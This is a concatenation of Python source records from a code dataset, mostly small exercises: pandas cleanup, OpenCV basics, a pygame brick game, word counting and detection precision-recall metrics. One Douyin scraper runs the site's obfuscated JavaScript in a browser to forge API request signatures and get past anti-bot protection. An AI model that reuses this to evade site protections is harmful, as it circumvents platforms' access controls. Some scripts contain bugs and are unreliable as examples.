LOCAL_KEYWORDS_FILEPATH))\n exit(1)\n return\n\n with open(keyword_file) as file:\n keyword_list = file.read().lower().split()\n\n find_in_code_additions(keyword_list)\n find_in_commit_message(keyword_list)\n find_in_file_names(keyword_list)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/test/connectivity/tools/keyword_check.py","file_name":"keyword_check.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339776878","text":"import pandas as pd\nimport numpy as np \n\n#read the data\npermits = pd.read_csv(\"Building_Permits.csv\")\n\n# set seed for reproducibility\nnp.random.seed(0) \n\n#get the number of missing data points per column\nmissing_values_count = permits.isnull().sum()\n\n# total missing values \ntotal_cells =np.product(permits.shape)\ntotal_missing = missing_values_count.sum()\n\n# percent of data that is missing\npercent_missing = (total_missing/total_cells)*100\n\n#figure out why the data is missing\n#is this value missing because it wasn't recorded or because it dosn't exist?\n\n#Drop missing values rows\npermits_with_na_dropped = sf_permits.dropna()\n\n#Drop missing values: columns\n#Create a new DataFrame called sf_permits_with_na_dropped that has all of the columns with empty values removed.\nsf_permits_with_na_dropped = sf_permits.dropna(axis=1)\n\n#How many columns were removed from the original sf_permits DataFrame?\ncolumn_in_original = sf_permits.shape[1]\ncolumn_with_na_dropped= sf_permits_with_na_dropped.shape[1]\ndropped_columns = column_in_original - column_with_na_dropped\n\n#Filling in missing values automatically\n#replace all the NaN's in the sf_permits data with the one that comes directly after it and then replacing any remaining NaN's with 0\nsf_permits_with_na_imputed = sf_permits.fillna(method='bfill',axis=0).fillna(0)","sub_path":"HandlingMissingValue.py","file_name":"HandlingMissingValue.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439334638","text":"# 颠倒二进制位\n\n\n# 48ms\nclass Solution:\n def reverseBits(self, n: int) -> int:\n # 这里会丢失前导0\n n = str(bin(n))[2:]\n n = list(reversed(n))\n n.extend(['0'] * (32 - len(n)))\n return int(''.join(n), 2)\n\n\ns = Solution()\nprint(s.reverseBits(0b00000010100101000001111010011100))\n","sub_path":"leetcode/others/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413338778","text":"from functools import reduce\n\n# prod = 1\n# list = [1,2,3,4]\n# for x in list:\n# prod *= x\n# print(prod)\n#\n# print(reduce( (lambda x,y: x*y),\n# [1,2,3,4]))\n\n# Use list comprehensions + reduce\n# * Frequency of a single word\n# * Total frequency of a group of words\n# * Most frequently occurring word\n\nlistOfWords = open(\"text.txt\", \"r\").read().split()\nlistOfWords = [w.lower().strip() for w in listOfWords]\n# print(listOfWords[0:150])\ntest = [\"a\", \"a\", \"b\", \"b\", \"b\", \"c\", \"c\", \"a\", \"b\", \"b\", \"c\", \"c\", \"a\", \"b\", \"b\"]\n\n#Completed\n#==========================================================================\ndef wordFrequency(word, list):\n # l = [1 for x in test if x == word]\n l = [1 for x in list if x == word]\n # return len(l)\n if len(l) == 0:\n return 0\n return reduce((lambda x,y: x+y), l)\n\n# print(wordFrequency(\"a\", test))\n# print(wordFrequency(\"b\", test))\n# print(wordFrequency(\"c\", test))\n# print(wordFrequency(\"d\", test))\n\n# print(wordFrequency(\"a\", listOfWords))\n# print(wordFrequency(\"I\", listOfWords))\n# print(wordFrequency(\"then\", listOfWords))\n# print(wordFrequency(\"Aristotle\", listOfWords))\n\ndef mostFrequentWord(list):\n return reduce((lambda x,y: x if wordFrequency(x, list) > wordFrequency(y, list) else y), list)\n\n# print(mostFrequentWord(listOfWords))\n# print(mostFrequentWord(test))\n\ndef wordGroupFrequency(wordGroup, list):\n wordGroupList = wordGroup.lower().split()\n numWords = len(wordGroupList)\n l = [1 for x in range(len(list)) if wordGroupList == list[x: x+numWords]]\n if len(l) == 0:\n return 0\n return reduce((lambda x,y: x+y), l)\n\n# print(wordGroupFrequency(\"a b b\", test))\nprint(wordGroupFrequency(\"the most\", listOfWords))\n#==========================================================================\n","sub_path":"20_anon-reduce/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"188111020","text":"parameter_vault = {\n \"DopplerCooling\": {\n \"doppler_cooling_duration\": 0e-6,\n \"doppler_cooling_repump_additional\": 0e-6,\n \"pre_duration\": 0e-6,\n \"doppler_cooling_frequency_397\": 80e6,\n \"doppler_cooling_amplitude_397\": 0.0,\n \"doppler_cooling_att_397\": 0.0,\n \"doppler_cooling_frequency_866\": 40e6,\n \"doppler_cooling_amplitude_866\": 0.0,\n \"doppler_cooling_att_866\": 0.0,\n },\n \"DriftTracker\": {\n \"current_b_field\": 4.0,\n \"current_line_center\": 0.0,\n },\n \"Excitation_729\": {\n \"rabi_excitation_frequency\": 0e3,\n \"rabi_excitation_amplitude\": 1.0,\n \"rabi_excitation_att\": 0.0,\n \"rabi_excitation_phase\": 0.0,\n \"channel_729\": \"729G\",\n \"rabi_excitation_duration\": 0e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n \"single_pass_amplitude\": 1.0,\n \"single_pass_att\": 0.0,\n },\n \"IonsOnCamera\": {\n \"ion_number\": 1,\n },\n \"LocalSpec\": {\n \"enable\": False,\n \"detuning\": 0.0,\n \"att\": 0.0,\n \"amp\": 1.0,\n \"duration\": 0e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n },\n \"MolmerSorensen\": {\n \"duration\": 50e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n \"line_selection_ion2\": \"S-1/2D-1/2\",\n \"due_carrier_enable\": False,\n \"selection_sideband\": \"axial_frequency\",\n \"detuning\": 6e3,\n \"detuning_carrier_1\": 0e3,\n \"detuning_carrier_2\": 0e3,\n \"amp_red\": 1.0,\n \"att_red\": 0.0,\n \"amp_blue\": 1.0,\n \"amp_blue_noise_std\": 0.0,\n \"att_blue\": 0.0,\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"amplitude_ion2\": 1.0,\n \"att_ion2\": 0.0,\n \"amp_blue_ion2\": 1.0,\n \"att_blue_ion2\": 0.0,\n \"amp_red_ion2\": 1.0,\n \"att_red_ion2\": 0.0,\n \"analysis_pulse_enable\": False,\n \"SDDS_enable\": False,\n \"SDDS_rotate_out\": False,\n \"rotate_in_with_global\": False,\n \"shape_profile\": 0,\n \"bichro_enable\": True,\n \"analysis_duration\": 5e-6,\n \"analysis_amplitude\": 1.0,\n \"analysis_att\": 0.0,\n \"analysis_amplitude_ion2\": 1.0,\n \"analysis_att_ion2\": 0.0,\n \"channel_729\": \"global\",\n \"ramsey_duration\": 20e-6,\n \"override_readout\": False,\n \"ms_phase\": 0.0,\n \"phase\": 0.0,\n \"sp_line1_amp\": 1.0,\n \"sp_line2_amp\": 1.0,\n \"sp_line1_att\": 0.0,\n \"sp_line2_att\": 0.0,\n \"sp_line1_blue_amp\": 1.0,\n \"sp_line2_blue_amp\": 1.0,\n \"sp_line1_blue_att\": 0.0,\n \"sp_line2_blue_att\": 0.0,\n \"sp_line1_red_amp\": 1.0,\n \"sp_line2_red_amp\": 1.0,\n \"sp_line1_red_att\": 0.0,\n \"sp_line2_red_att\": 0.0,\n \"sp_due_enable\": False,\n \"ac_stark_shift\": 0e3,\n },\n \"OpticalPumping\": {\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"optical_pumping_frequency_854\": 30e6,\n \"optical_pumping_amplitude_854\": 1.0,\n \"optical_pumping_att_854\": 0.0,\n \"line_selection\": \"S-1/2D+3/2\", \n },\n \"OpticalPumpingContinuous\": {\n \"optical_pumping_continuous_duration\": 100e-6,\n \"optical_pumping_continuous_repump_additional\": 0e-6,\n },\n \"RabiFlopping\": {\n \"line_selection\": \"S-1/2D-1/2\",\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"channel_729\": \"729G\",\n \"duration\": 5e-6,\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 0,\n \"detuning\": 0.0,\n \"composite_pi_rotation\": False,\n \"noise\": False,\n },\n \"Rotation729L1\": {\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"pi_time\": 2e-6,\n \"composite_pi_rotation\": False,\n },\n \"Rotation729G\": {\n \"amplitude\": 1.0,\n \"att\": 0.0,\n \"pi_time\": 2e-6,\n \"line_selection\": \"S-1/2D-1/2\",\n },\n \"SidebandCooling\": {\n \"line_selection\": \"S-1/2D-5/2\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n \"stark_shift\": 0e3,\n \"channel_729\": \"729G\",\n \"amplitude_729\": 1.0,\n \"att_729\": 0.0,\n \"duration\": 100e-6,\n \"frequency_866\": 40e6,\n \"amplitude_866\": 1.0,\n \"att_866\": 0.0,\n \"frequency_854\": 20e6,\n \"amplitude_854\": 1.0,\n \"att_854\": 0.0,\n \"sideband_cooling_cycles\": 1,\n },\n \"SequentialSBCooling\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"SequentialSBCooling1\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"SequentialSBCooling2\": {\n \"enable\": False,\n \"channel_729\": \"729G\",\n \"selection_sideband\": \"axial_frequency\",\n \"order\": 1,\n },\n \"StatePreparation\": {\n \"optical_pumping_enable\": False,\n \"aux_optical_pumping_enable\": False,\n \"pulsed_optical_pumping\": False,\n \"sideband_cooling_enable\": False,\n \"post_delay\": 0e-6,\n \"number_of_cycles\": 1,\n \"pulsed_854_duration\": 100e-6,\n \"pi_time\": 10e-6,\n \"channel_729\": \"729G\",\n \"pulsed_amplitude\": 1.0,\n \"pulsed_att\": 0.0,\n },\n \"StateReadout\": {\n \"readout_mode\": \"pmt\",\n \"repeat_each_measurement\": 100,\n },\n \"SZX\": {\n \"one_ion_vaet\": False,\n \"duration\": 10e-6,\n \"channel_729\": \"729G\",\n \"bichro_enable\": False,\n \"nu_effective\": 0e3,\n \"amp_blue\": 1.0,\n \"amp_red\": 1.0,\n \"att_blue\": 0.0,\n \"att_red\": 0.0,\n \"amplitude\": 1.0,\n \"local_rabi_amp\": 1.0,\n \"amplitude_L2\": 1.0,\n \"att_SP_L2\": 0.0,\n \"att\": 0.0,\n \"local_rabi_att\": 0.0,\n \"sideband_selection\": \"axial_frequency\",\n \"line_selection\": \"S-1/2D-1/2\",\n \"carrier_detuning\": 0e3,\n \"carrier_detuning_L1\": 0e3,\n \"phase\": 0.0,\n \"AC_stark_local\": 0.0,\n },\n \"TrapFrequencies\": {\n \"axial_frequency\": 1e6,\n \"radial_frequency_1\": 2e6,\n \"radial_frequency_2\": 2.4e6,\n },\n}\n\ndef get_collections():\n return parameter_vault.keys()\n\ndef get_parameter_names(collection):\n return parameter_vault[collection].keys()\n\ndef get_parameter(path):\n collection = path[0]\n name = path[1]\n return parameter_vault[collection][name]\n\ndef set_parameter(path, value):\n collection = path[0]\n if collection not in get_collections():\n raise Exception(f\"collection {collection} does not exist\")\n name = path[1]\n if name not in get_parameter_names(collection):\n raise Exception(f\"parameter {name} does not exist in collection {collection}\")\n parameter_vault[collection][name] = value\n","sub_path":"simulated_parameter_vault.py","file_name":"simulated_parameter_vault.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447469351","text":"import pygame as pg\r\nimport random\r\n\r\nLarguraPokemon,AlturaPokemon = 35,35\r\nXPokemon,YPokemon = random.randrange(0,666,35),random.randrange(0,596,35)\r\n\r\nGrupoPokemon = pg.sprite.Group()\r\nPokemon = pg.sprite.Sprite(GrupoPokemon)\r\nPokemon.image = pg.image.load('Colecionaveis/Recursos/Pikachu.png')\r\nPokemon.image = pg.transform.scale(Pokemon.image, [50,50])\r\nPokemon.rect = pg.Rect(XPokemon,YPokemon,LarguraPokemon,AlturaPokemon)","sub_path":"Colecionaveis/Dados/DadosPokemon.py","file_name":"DadosPokemon.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"627528000","text":"import os, sys, random\nimport pygame \nfrom pygame.locals import *\n\nfrom drew import *\n\ncanvas_width = 800\ncanvas_height = 600\n\nblock = (0,0,0)\n\nbricks_list = []\n\n# velocity\ndx = 4\ndy = -4\npaddle_speed = 0\n\n# game mode\n# 0:prepare\n# 1:playing\ngame_mode = 0\n\ndef showFont( text, x, y):\n global canvas \n text = font.render(text, 1, (150, 200, 200)) \n canvas.blit( text, (x,y))\n\ndef isCollision( x, y, boxRect):\n if (x >= boxRect[0] and x <= boxRect[0] + boxRect[2] and y >= boxRect[1] and y <= boxRect[1] + boxRect[3]):\n return True; \n #elif() \n return False; \n\ndef resetGame():\n global game_mode, brick_num, bricks_list, dx, dy\n\n #brick\n for bricks in bricks_list:\n r = random.randint(100,200)\n g = random.randint(100,200)\n b = random.randint(100,200)\n bricks.color = [r,g,b] \n bricks.visivle = True\n game_mode = 0\n brick_num = 99 \n dx = 8\n dy = -8\n\npygame.init()\n\npygame.display.set_caption(u\"Hello Pong!\")\n\ncanvas = pygame.display.set_mode((canvas_width, canvas_height))\n \nclock = pygame.time.Clock()\n\nfont = pygame.font.SysFont('Arial', 30)\n\n#paddle\npaddle_x = 360\npaddle_y = (canvas_height - 48)\npaddle = Box(pygame, canvas, \"paddle\", [paddle_x, paddle_y, 100, 24], (random.randint(100,200),random.randint(100,200),random.randint(100,200))) \n\n#ball\nball_x = 360\nball_y = paddle_y\nball = Circle(pygame, canvas, \"ball\", [ball_x, ball_x], 8, (random.randint(100,200),random.randint(100,200),random.randint(100,200)))\n\n#construct the brick\nbrick_num = 0\nbrick_x = 70\nbrick_y = 60\nbrick_w = 0\nbrick_h = 0\nfor i in range( 0, 90):\n if((i % 9)==0):\n brick_w = 0\n brick_h = brick_h + 28 \n bricks_list.append (Box(pygame, canvas, \"brick_\"+str(i), [ brick_w + brick_x, brick_h+ brick_y, 68, 26], [255,255,255]))\n brick_w = brick_w + 70\n\nresetGame()\n\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.key == pygame.K_RIGHT:\n paddle_speed = 10\n elif event.key == pygame.K_LEFT:\n paddle_speed = -10\n elif event.key == pygame.K_SPACE:\n if(game_mode == 0):\n game_mode = 1\n elif event.type == pygame.KEYUP:\n paddle_speed = 0\n paddle_x = paddle_speed + paddle_x\n\n canvas.fill(block)\n \n # bricks\n for bricks in bricks_list:\n if(isCollision( ball.pos[0], ball.pos[1], bricks.rect)):\n if(bricks.visivle): \n brick_num = brick_num -1\n if(brick_num <= 0):\n resetGame()\n break\n dy = -dy; \n bricks.visivle = False\n \n bricks.update()\n \n showFont( u\"Bricks Number:\"+str(brick_num), 8, 20) \n\n paddle.rect[0] = paddle_x\n paddle.update()\n\n if(isCollision( ball.pos[0], ball.pos[1], paddle.rect)): \n dy = -dy; \n if(game_mode == 0):\n ball.pos[0] = ball_x = paddle.rect[0] + ( (paddle.rect[2] - ball.radius) >> 1 )\n ball.pos[1] = ball_y = paddle.rect[1] - ball.radius \n if(paddle_x + paddle_speed >= canvas_width - 102):\n paddle_x = canvas_width-102\n if(paddle_x + paddle_speed <= 2):\n paddle_x = 2 \n elif(game_mode == 1):\n ball_x += dx\n ball_y += dy\n if(ball_y + dy > canvas_height - ball.radius):\n game_mode = 0 \n if(ball_x + dx > canvas_width - ball.radius or ball_x + dx < ball.radius):\n dx = -dx\n if(ball_y + dy > canvas_height - ball.radius or ball_y + dy < ball.radius): \n dy = -dy\n if(paddle_x + paddle_speed >= canvas_width - 102):\n paddle_x = canvas_width-102\n if(paddle_x + paddle_speed <= 2):\n paddle_x = 2 \n\n ball.pos[0] = ball_x\n ball.pos[1] = ball_y\n\n ball.update()\n\n showFont( u\"FPS:\" + str(clock.get_fps()), 8, 1) \n\n pygame.display.update()\n clock.tick(60)\n\npygame.quit()\nquit()\n","sub_path":"Hello Pong!/Hello Pong!.py","file_name":"Hello Pong!.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13384103","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 5 15:57:16 2020\n\n@author: ujwal\n\"\"\"\n\n#import libraries\nimport imutils \nimport cv2\n\n#load i/p image and show dimensions in form (width*height*depth)\nimage = cv2.imread(\"jp.png\")\n(h,w,d) = image.shape\nprint(\"width = {},height = {}, depth ={}\".format(w,h,d))\n\n#display image on screen\ncv2.imshow(\"Image\", image)\ncv2.waitKey(0)\n\n#accessing a bgr at certain location\n(B,G,R) = image(100,50)\nprint(\"R={}, G={}, B={}\".format(R, G, B))\n\n#cropping with slicing \n# extract a 100x100 pixel square ROI (Region of Interest) from the\n# input image starting at x=320,y=60 at ending at x=420,y=160\nroi = image[60:160, 320:420]\ncv2.imshow(\"ROI\", roi)\ncv2.waitKey(0)\n\n#resizing images\nresized = cv2.resize(image,(200,200))\ncv2.imshow(\"Fixed Resizing\", resized)\ncv2.waitKey(0)\n# this causes distortion\n\n#fix by aaspect ratio\nr = 300.0/w\ndim = (300,int(h*r))\nresized = cv2.resize(image,dim)\ncv2.imshow(\"Aspect Ratio Resize: \", resized)\ncv2.waitKey(0)\n\n#resize using imutils\nresized = imutils.resize(image, width = 300)\ncv2.imshow(\"Imutils Resize: \", resized)\ncv2.waitKey(0)\n\n#rotating image from center by 45 degrees\ncenter = (w//2,h//2)\nM = cv2.getRotationMatrix2D(center,-45,1.0)\nrotated = cv2.warpAffine(image, M, (w,h))\ncv2.imshow(\"OpenCV Rotation: \", rotated)\ncv2.waitKey(0)\n\n#rotation using imutils\nrotated = imutils.rotate(image,-45)\ncv2.imshow(\"Imutils Rotated: \", rotated)\ncv2.waitKey(0)\n\n#rotate withut clipping\nrotated = imutils.rotate_bound(image, -45)\ncv2.imshow(\"Rotate vound Rotate: \", rotated)\ncv2.waitKey(0)\n\n#image smoothing using gaussian blur\nblurred = cv2.GaussianBlur(image, (11,11),0)\ncv2.imshow(\"Gaussian Blurred: \", blurred)\ncv2.waitKey(0)\n\n#insert objects\n#2px thich red rectangle surrounding the face\noutput = image.copy()\ncv2.rectangle(output, (200, 0), (429, 0), (0, 0, 255), 2)\ncv2.imshow(\"Rectangle\", output)\ncv2.waitKey(0)\n\n# draw a blue 20px (filled in) circle on the image centered at\n# x=300,y=150\noutput = image.copy()\ncv2.circle(output, (300, 150), 50, (255, 0, 0), -5)\ncv2.imshow(\"Circle\", output)\ncv2.waitKey(0)\n\n# draw a 5px thick red line from x=60,y=20 to x=400,y=200\noutput = image.copy()\ncv2.line(output, (60, 20), (400, 200), (0, 0, 255), 5)\ncv2.imshow(\"Line\", output)\ncv2.waitKey(0)\n\n# draw green text on the image\noutput = image.copy()\ncv2.putText(output, \"OpenCV + Jurassic Park!!!\", (10, 25), \n\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)\ncv2.imshow(\"Text\", output)\ncv2.waitKey(0)\n\n\n\n\n","sub_path":"OpenCV/temp1.py","file_name":"temp1.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569084366","text":"#-*-coding:utf-8-*-\nimport json\nfrom selenium import webdriver\nimport requests,re\nimport time\n\nshare_id='83072448142'\nshare_url='https://www.douyin.com/share/user/{}'.format(share_id)\nwith open('decode_js.txt','r') as f:\n f5=f.read()\n\nwith open('decode_js1.txt','r') as f2:\n f6=f2.read().replace(\"&&&\",share_id)\n\n\n# headers={'User_Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}\nheaders={\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n}\nresponse=requests.get(share_url,headers=headers).text\n# print(response)\n#不需要匹配单引号,是url的字符串\npattern=re.compile(\"dytk: '(.*?)'\",re.S)\ndytk=re.findall(pattern,response)[0]\n# print(dytk)\n#注意匹配进去单引号,js里面的字符串括起来\npattern1=re.compile(r\"\",re.S)\ntac=\"var tac=\"+re.findall(pattern1,response)[0]+\";\"\n# print(tac)\n# \"\"\n\nwith open('decode_js.html','w') as f1:\n f1.write(f5+'\\n'+str(tac)+'\\n'+f6)\n # f1.write(f5 )\n\ndriver=webdriver.Chrome()\ndriver.get('C:\\spider\\douyinapp\\decode_js.html')\n_signature=driver.title\n# _signature=input('输入_signature密匙:')\n# print(_signature)\n# _signature=\nvideo_url='https://www.iesdouyin.com/web/api/v2/aweme/post/?user_id='+share_id+'&sec_uid=&count=21&max_cursor=0&aid=1128&_signature='+_signature+'&dytk='+dytk\nheaders1={\n# \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n# \"authority\":\"www.iesdouyin.com\",\n# \"method\":\"GET\",\n# \"path\":\"/web/api/v2/aweme/post/?user_id=83072448142&sec_uid=&count=21&max_cursor=0&aid=1128&_signature=0CJdgBATjXEVRwUNDT5v49AiXZ&dytk=0091c461fa8e5292f574d08e67c552b1\",\n# \"scheme\":\"https\",\n# \"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n# \"accept-encoding\":\"gzip,deflate, br\",\n# \"accept-language\":\"zh-CN,zh;q=0.9\",\n# # \"cache-control\":\"max-age=0\",\n# \"upgrade-insecure-requests\":\"1\",\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36\",\n}\nwhile 1:\n response=requests.get(video_url,headers=headers)\n # print(response.text,response.url)\n if json.loads(response.text)['aweme_list']==[]:\n time.sleep(1)\n driver.get(video_url)\n print(driver.page_source)\n break\n else:\n print(response.text, response.url)\n break\n","sub_path":"douyinapp/js_run.py","file_name":"js_run.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112582615","text":"from motion_detector import df\r\nfrom bokeh.plotting import figure, show, output_file\r\nfrom bokeh.models import HoverTool, ColumnDataSource\r\n\r\ndf[\"Start_formatted\"] = df[\"Start\"].dt.strftime(\"%Y-%m-%d %H:%M:%S\")\r\ndf[\"End_formatted\"] = df[\"End\"].dt.strftime(\"%Y-%m-%d %H:%M:%S\")\r\ncds = ColumnDataSource(df)\r\n\r\nfig = figure(x_axis_type='datetime', height=500, width=800,\r\n title=\"Motion detector graph\", align='center')\r\nfig.yaxis.minor_tick_line_color = None\r\nfig.ygrid[0].ticker.desired_num_ticks = 1\r\nhover = HoverTool(tooltips=[(\"Start \", \"@Start_formatted\"),\r\n (\"End \", \"@End_formatted\")])\r\nfig.add_tools(hover)\r\nq = fig.quad(left=\"Start\", right=\"End\", bottom=0, top=1, color=\"cyan\",\r\n source=cds)\r\noutput_file(\"graph.html\")\r\nshow(fig)\r\n","sub_path":"motion_detector/log_n_plot.py","file_name":"log_n_plot.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"66295895","text":"import sqlite3\n\nfrom config import *\n\n\ncon = sqlite3.connect(database)\ncur = con.cursor()\n\n\ndef sql(query):\n cur.execute(query)\n con.commit()\n\n\ndef select(query):\n cur.execute(query)\n return cur.fetchone()[0]\n\n\ndef db_init():\n sql(\"CREATE TABLE IF NOT EXISTS status (id INTEGER PRIMARY KEY, \\\n isParsed BOOLEAN,\\\n isDownloaded BOOLEAN,\\\n isTagged BOOLEAN)\")\n\n sql(\"CREATE TABLE IF NOT EXISTS tags (id INTEGER PRIMARY KEY,\\\n title TEXT,\\\n year INTEGER,\\\n description TEXT)\")\n\n sql(\"CREATE TABLE IF NOT EXISTS files (id INTEGER PRIMARY KEY,\\\n taleName TEXT,\\\n mp3URL TEXT,\\\n coverURL TEXT)\")\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"619996362","text":"from collections import Counter\n\ndef minSteps(s: str, t: str) -> int:\n sCounter = Counter(s)\n sCounter.subtract(t)\n changes = 0\n for char in sCounter.values():\n changes += char if char > 0 else 0\n return changes\n\nif __name__ == \"__main__\":\n s = input('Enter a string: ')\n t = input('Enter another string of the same length: ')\n result = minSteps(s, t)\n print(f\"\\nThe number of changes needed to make the\\nsecond string an anagram of the first is {result}\")","sub_path":"minStepsToMakeAnagram.py","file_name":"minStepsToMakeAnagram.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99239545","text":"import sys\nimport time\nimport os\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom PIL import Image, ImageDraw\nfrom utils import *\nfrom load_data import PatchTransformer, PatchApplier, InriaDataset\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef compute_IOU(bbox1_o, bbox2_o):\n '''\n\n :param bbox1_o: list: up_left_x, up_left_y, width, height\n :param bbox2_o: list: up_left_x, up_left_y, width, height\n :return:\n '''\n # bbox1 = [0., 0., 0., 0.]\n # bbox2 = [0., 0., 0., 0.]\n # bbox1[0] = bbox1_o[0]\n bbox1 = bbox1_o.copy()\n bbox2 = bbox2_o.copy()\n bbox1[2] = bbox1_o[2] + bbox1_o[0]\n bbox1[3] = bbox1_o[3] + bbox1_o[1]\n bbox2[2] = bbox2_o[2] + bbox2_o[0]\n bbox2[3] = bbox2_o[3] + bbox2_o[1]\n\n ixmin = max(bbox1[0], bbox2[0])\n iymin = max(bbox1[1], bbox2[1])\n ixmax = min(bbox1[2], bbox2[2])\n iymax = min(bbox1[3], bbox2[3])\n iw = max(ixmax - ixmin, 0.)\n ih = max(iymax - iymin, 0.)\n inters = iw * ih\n\n # union\n uni = ((bbox1[2] - bbox1[0]) * (bbox1[3] - bbox1[1]) +\n (bbox2[2] - bbox2[0]) * (bbox2[3] - bbox2[1]) - inters)\n\n overlap = inters / uni\n return overlap\n\n\ndef match_det(det_list, anno_list, threshold):\n\n for item in det_list:\n item['tp'] = 0\n item['fp'] = 0\n name = item['image_id']\n wait_anno_list = []\n overlap_list = []\n for item2 in anno_list:\n if item2['image_id'] == name:\n wait_anno_list.append(item2['bbox'])\n\n if len(wait_anno_list) > 0:\n anno_bbox_to_del_list = []\n for item3 in wait_anno_list:\n overlap = compute_IOU(item['bbox'], item3)\n overlap_list.append(overlap)\n anno_bbox_to_del_list.append(item3)\n ovmax = max(overlap_list)\n jmax = overlap_list.index(max(overlap_list))\n anno_bbox_to_del = anno_bbox_to_del_list[jmax]\n\n\n if ovmax > threshold:\n item['tp'] = 1\n for item4 in anno_list:\n if item4['image_id'] == name and item4['bbox'] == anno_bbox_to_del:\n # print(len(anno_list))\n anno_list.remove(item4)\n continue\n # print(len(anno_list))\n else:\n item['fp'] = 1\n else:\n item['fp'] = 1\n return det_list\n\n\ndef get_score(elem):\n return elem['score']\n\n\ndef get_first(elem):\n return elem[0]\n\n\ndef get_second(elem):\n return elem[1]\n\n\ndef pr(det_list2, anno_list2, threshold):\n import copy\n det_list = copy.deepcopy(det_list2)\n anno_list = copy.deepcopy(anno_list2)\n GTBB_num = len(anno_list)\n det_list.sort(key=get_score, reverse=True)\n det_list_tp_fp = match_det(det_list, anno_list, threshold)\n det_list_tp_fp.sort(key=get_score, reverse=True) # reverse=True : from big to small\n recall_list = []\n precision_list = []\n recall_precision_list = []\n confidence_old = 0\n\n list_show = []\n for it in det_list_tp_fp:\n list_show.append([it['image_id'], it['score'], it['tp']])\n\n for m in range(1, len(det_list_tp_fp)):\n tp = 0\n fp = 0\n tpsum = []\n\n if det_list_tp_fp[m]['tp'] == det_list_tp_fp[m]['fp']:\n print('error kkkkkkkkkkkkkkkk')\n for k in range(m):\n tp = tp + det_list_tp_fp[k]['tp']\n fp = fp + det_list_tp_fp[k]['fp']\n tpsum.append(tp)\n recall = tp/GTBB_num\n precision = tp/(tp+fp)\n\n\n if det_list_tp_fp[m]['score'] != confidence_old:\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n else:\n # recall_list.pop()\n # precision_list.pop()\n # recall_precision_list.pop()\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n confidence_old = det_list_tp_fp[m]['score']\n\n recall_list.append(recall)\n precision_list.append(precision)\n recall_precision_list.append([recall, precision])\n\n return recall_precision_list, recall_list, precision_list\n\n\ndef ap(recall_precision_list):\n if len(recall_precision_list) == 0:\n return float('nan')\n if len(recall_precision_list) == 1:\n repr = recall_precision_list[0]\n return repr[0] * repr[1]\n\n # use recall to sort , get_first\n recall_precision_list.sort(key=get_first, reverse=False) # reverse=True : from big to small\n\n recall_list = []\n precision_list = []\n for item in 